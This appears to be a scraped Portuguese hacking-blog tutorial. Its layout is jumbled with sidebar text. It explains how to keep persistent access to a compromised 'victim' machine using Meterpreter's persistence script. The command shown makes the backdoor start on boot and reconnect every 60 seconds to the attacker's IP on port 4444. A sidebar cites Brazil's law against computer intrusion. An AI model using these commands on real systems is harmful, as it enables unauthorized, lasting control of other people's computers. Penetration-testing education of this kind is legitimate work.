Você está na página 1de 4

INÍCIO / GREEN HAT / ENTRE NA MATRIX / FAQ / SOBRE NÓS

Mantendo conexão com a vítima Pesquisar … PESQUISAR

(Manutenção de Acesso)
Como previsto na Lei 12.737/2012 no
28 DE ABRIL DE 2015 / S0PH0S
Art. 154-A invadir dispositivo
informático alheio, conectado ou não à
Como já vimos diversas vezes o ataque que utiliza a conexão reversa vemos que temos
rede de computadores, mediante
acesso total a máquina, mas muitas vezes quando acontece uma queda de conexão
violação indevida de mecanismo de
devido a um desligamento do dispositivo (computador) ou a queda da internet. Hoje segurança e com o fim de obter,
veremos sobre como fazer uma manutenção de acesso que irá permitir todas vez que a adulterar ou destruir dados ou
vítima reconecte conosco de acordo com as opções que iremos setar na máquina alvo. informações sem autorização expressa
ou tácita do titular do dispositivo ou
instalar vulnerabilidades para obter
vantagem ilícita. Pena – detenção, de 3
(três) meses a 1 (um) ano, e multa.

Ajude o CIência Hacker

Ciência Hacker

YouTube 6K

Caso ainda não saiba como criar uma conexão reversa com a vítima clique aqui para
Tweets de @cienciahacker
conferir o tutorial.

Após ter feito infectado a vítima com sua backdoor, vamos configurar a manutenção de
acesso.
Ciência Hacker
# run persistence -h

Nos trará todas as opções que podem ser listada para configuração de nosso acesso,
sendo assim setamos as configurações necessárias para configuração de nosso acesso.

# run persistence -A -X -i 60 -p 4444 -f (Seu_IP)

Esse comando nos permitirá:

– Conectar com a vítima automaticamente quando você estiver em modo listing


utilizando o multi/handler.

Opção -A

– Quando o sistemar der boot automaticamente será carregado o noss processo


(nossa backdoor será iniciada).

Opção -X

– Setaremos o intervalo em segundos para nossa conexão (No exemplo setamos com
60 segundos).

Opção -i 60

– A porta que conectamos, deverá ser a mesma criada pelo nosso Payload
anteriormente, como a porta 4444 .

Opção -p 4444

– E nosso IP para receber a chamada.

Opção -f (Seu_IP)

 Artigos, Pentest
MANUTENÇÃO DE ACESSO (MANTENDO CONEXÃO COM A VÍ TI MA)
s0ph0s@cienciahacker:~# whoami _

"With great power comes great responsibility"

Compartilhe esse post:

Facebook Twitter Google+

Identificando e quebrando Hashs (senhas) Invadindo Windows 7 e 8 (Conexão Reversa)

Deixe uma resposta

O seu endereço de email não será publicado Campos obrigatórios são marcados *

Nome *

Email *

Site

Comentário

Você pode usar estas tags e atributos de HTML: <a href="" title=""> <abbr
title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del

datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>


Publicar comentário

Você também pode gostar